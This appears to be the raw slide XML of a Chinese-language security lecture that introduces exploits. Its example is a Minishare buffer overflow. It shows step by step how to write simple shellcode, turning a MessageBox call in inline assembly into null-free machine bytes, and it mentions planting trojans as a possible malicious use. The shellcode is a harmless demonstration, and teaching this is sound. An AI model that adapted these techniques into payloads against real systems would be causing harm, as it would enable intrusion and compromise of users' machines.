              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>windows.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>void main(){</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>("user32.dll");//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>加载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>user32.dll</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>asm</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ebx,ebx</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>//push 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>push 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的机器代码会出现一个字节的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，对于直接利用需要解决字节为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的问题，因此转换为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>, 77d507eah// 77d507eah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>MessageBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>函数在系统中的地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>return;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="481700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59913471-79C0-4B60-AFDA-9776520A54ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1388815" y="1528093"/>
            <a:ext cx="11656434" cy="5112569"/>
            <a:chOff x="1385640" y="1846974"/>
            <a:chExt cx="11361653" cy="3371707"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="矩形: 圆角 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5E3EC1C-74FC-4C48-9D84-DA52DC0FBCE8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1385640" y="1846974"/>
              <a:ext cx="10332290" cy="3371707"/>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938C6252-55B6-42CE-98FC-347733AE6A0C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1574860" y="2017200"/>
              <a:ext cx="9917706" cy="2699590"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pP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漏洞利用（</a:t>
              </a:r>
              <a:r>
                <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exploit</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）是指针对已有的漏洞，根据漏洞的类型和特点而采取相应的技术方案，进行尝试性或实质性的攻击</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Exploit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的英文意思就是利用，它在黑客眼里就是漏洞利用。有漏洞不一定就有</a:t>
              </a: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Exploit</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（利用），但是有</a:t>
              </a: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Exploit</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就肯定有漏洞。</a:t>
              </a:r>
              <a:endPar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spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:b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b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假设，刚刚发现了一个</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="20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Minishare</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0Day</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漏洞。</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="20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Minishare</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是一款文件共享软件，该</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0Day</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漏洞是一个缓冲区溢出漏洞，这个漏洞影响之前的所有版本。当用户向服务器发送的报文长度过大（超过堆栈边界）时就会触发该漏洞。</a:t>
              </a:r>
              <a:b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b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得到该漏洞后，可以做点什么呢？善意点的，可以对同学或者朋友的电脑搞搞恶作剧，让他的电脑弹出个对话框之类的。恶意的话，可以利用这个漏洞来向目标机器植入木马，窃听用户个人隐私等。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="矩形 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72F11990-1FE8-4A57-927F-DBD99D30DFCB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3982558" y="4792614"/>
              <a:ext cx="8764735" cy="263870"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pP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那么，到底如何能达成这些目的呢？</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main"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3871" y="5647795"/>
            <a:ext cx="1373379" cy="1373379"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CBA4C38-133D-4615-AA5C-4AB9BDE3F67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4616798" y="837929"/>
            <a:ext cx="3625157" cy="523220"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="523220"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B97828-018C-46B1-9C84-9C38BF0C2B0C}"/>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2ECAD2EB-634C-448E-A94C-5E5E4A28D7DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5637751" y="837929"/>
              <a:ext cx="1583247" cy="523220"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="fr-FR" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>漏洞利用</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概念</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR"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2997488905"/>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269135" y="837929"/>
            <a:ext cx="4320480" cy="474140"/>
            <a:chOff x="4269135" y="837929"/>
            <a:chExt cx="4320480" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="55" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF07046-8558-4F68-A567-BFF83801B119}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4269135" y="1312069"/>
              <a:ext cx="4320480"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4500001" y="837929"/>
              <a:ext cx="3858750" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>简单的编写</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Shellcode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>的方法</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{832A7433-295D-472A-8920-856B4D551924}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1604839" y="1492164"/>
            <a:ext cx="5832648"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Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>第三步 根据汇编代码，找到对应地址中的机器码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F25D7130-52A2-4F91-BD2D-83E4F6017EC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1667413" y="2072852"/>
            <a:ext cx="7426258" cy="499432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在汇编第一行代码处打断点，利用调试定位具体内存中的地址：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B762338C-E8CE-4158-B512-BC41927632C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7941543" y="2896245"/>
            <a:ext cx="3672409" cy="2016150"/>
            <a:chOff x="3333031" y="3472310"/>
            <a:chExt cx="5765357" cy="2016150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F096116-2FF5-4E31-9CDA-FABDFC81DFFF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3546696" y="3616251"/>
              <a:ext cx="5338026" cy="1592039"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>这样，在</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>Memory</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>窗口就可以找到对应的机器码：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>33 DB 53 53 53 53 B8 EA 07 D5 77 FF D0</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形: 圆角 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF96D66-92B2-4E47-BD73-1827E4D5E6EC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3333031" y="3472310"/>
              <a:ext cx="5765357" cy="2016150"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC9FF7D-0191-42F9-AFEB-65BE68B197EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1604839" y="2674459"/>
            <a:ext cx="5616624" cy="3967890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1636043159"/>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par>
                          <p:cTn id="17" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="18" presetID="22" presetClass="entr" presetSubtype="1"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up)">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532831" y="1036788"/>
            <a:ext cx="9361040" cy="394996"/>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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>接下来就可以利用这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
